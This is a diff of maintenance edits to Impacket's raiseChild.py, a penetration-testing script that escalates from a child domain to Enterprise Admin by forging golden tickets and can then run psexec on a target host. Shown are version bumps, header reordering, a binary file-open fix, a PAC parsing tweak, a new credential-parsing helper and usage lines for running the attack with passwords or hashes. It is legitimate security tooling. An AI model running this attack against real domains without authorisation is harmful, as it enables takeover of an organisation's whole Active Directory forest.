@@ -1,13 +1,13 @@
-#!/usr/local/bin/python3.9
-#!/usr/local/bin/python3.9
-# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#!/usr/local/bin/python3.12
+#!/usr/local/bin/python3.12
+# Impacket - Collection of Python classes for working with network protocols.
 #
-# This software is provided under under a slightly modified version
+# SECUREAUTH LABS. Copyright (C) 2021 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under a slightly modified version
 # of the Apache Software License. See the accompanying LICENSE file
 # for more information.
 #
-# Author: Alberto Solino (@agsolino)
-#
 # Description:
 #   This script implements a child-domain to forest privilege escalation
 #   as detailed by Sean Metcalf (@PyroTek3) at https://adsecurity.org/?p=1640. We will
@@ -53,7 +53,10 @@
 #     A domain is, however, the administrative boundary for managing objects, such as users, groups, and computers.
 #     In addition, each domain has its own individual security policies and trust relationships with other domains.
 #
+# Author:
+#   Alberto Solino (@agsolino)
 #
+
 from __future__ import division
 from __future__ import print_function
 import argparse
@@ -88,6 +91,7 @@ from impacket.dcerpc.v5.samr import NULL, GROUP_MEMBERSHIP, SE_GROUP_MANDATORY,
 from pyasn1.codec.der import decoder, encoder
 from pyasn1.type.univ import noValue
 from impacket.examples import logger
+from impacket.examples.utils import parse_credentials
 from impacket.ntlm import LMOWFv1, NTOWFv1
 from impacket.dcerpc.v5.dtypes import RPC_SID, MAXIMUM_ALLOWED
 from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_GSS_NEGOTIATE
@@ -163,7 +167,7 @@ class PSEXEC:
                 installService = serviceinstall.ServiceInstall(rpctransport.get_smb_connection(), remcomsvc.RemComSvc())
             else:
                 try:
-                    f = open(self.__exeFile)
+                    f = open(self.__exeFile, 'rb')
                 except Exception as e:
                     logging.critical(str(e))
                     sys.exit(1)
@@ -903,7 +907,7 @@ class RAISECHILD:
             validationInfo = VALIDATION_INFO()
             validationInfo.fromString(pacInfos[PAC_LOGON_INFO])
             lenVal = len(validationInfo.getData())
-            validationInfo.fromStringReferents(data[lenVal:], lenVal)
+            validationInfo.fromStringReferents(data, lenVal)
 
             if logging.getLogger().level == logging.DEBUG:
                 logging.debug('VALIDATION_INFO before making it gold')
@@ -1249,18 +1253,18 @@ if __name__ == '__main__':
     if len(sys.argv)==1:
         parser.print_help()
         print("\nExamples: ")
-        print("\t/usr/local/bin/python3.9 raiseChild.py childDomain.net/adminuser\n")
+        print("\t/usr/local/bin/python3.12 raiseChild.py childDomain.net/adminuser\n")
         print("\tthe password will be asked, or\n")
-        print("\t/usr/local/bin/python3.9 raiseChild.py childDomain.net/adminuser:mypwd\n")
+        print("\t/usr/local/bin/python3.12 raiseChild.py childDomain.net/adminuser:mypwd\n")
         print("\tor if you just have the hashes\n")
-        print("\t/usr/local/bin/python3.9 raiseChild.py -hashes LMHASH:NTHASH childDomain.net/adminuser\n")
+        print("\t/usr/local/bin/python3.12 raiseChild.py -hashes LMHASH:NTHASH childDomain.net/adminuser\n")
 
         print("\tThis will perform the attack and then psexec against target-exec as Enterprise Admin")
-        print("\t/usr/local/bin/python3.9 raiseChild.py -target-exec targetHost childDomainn.net/adminuser\n")
+        print("\t/usr/local/bin/python3.12 raiseChild.py -target-exec targetHost childDomainn.net/adminuser\n")
         print("\tThis will perform the attack and then psexec against target-exec as User with RID 1101")
-        print("\t/usr/local/bin/python3.9 raiseChild.py -target-exec targetHost -targetRID 1101 childDomainn.net/adminuser\n")
+        print("\t/usr/local/bin/python3.12 raiseChild.py -target-exec targetHost -targetRID 1101 childDomainn.net/adminuser\n")
         print("\tThis will save the final goldenTicket generated in the ccache target file")
-        print("\t/usr/local/bin/python3.9 raiseChild.py -w ccache childDomain.net/adminuser\n")
+        print("\t/usr/local/bin/python3.12 raiseChild.py -w ccache childDomain.net/adminuser\n")
         sys.exit(1)
  
     options = parser.parse_args()
@@ -1268,17 +1272,7 @@ if __name__ == '__main__':
     # Init the example's logger theme
     logger.init(options.ts)
 
-    import re
-    # This is because I'm lazy with regex
-    # ToDo: We need to change the regex to fullfil domain/username[:password]
-    targetParam = options.target + '@'
-    domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(
-        targetParam).groups('')
-
-    #In case the password contains '@'
-    if '@' in address:
-        password = password + '@' + address.rpartition('@')[0]
-        address = address.rpartition('@')[2]
+    domain, username, password = parse_credentials(options.target)
 
     if options.debug is True:
         logging.getLogger().setLevel(logging.DEBUG)
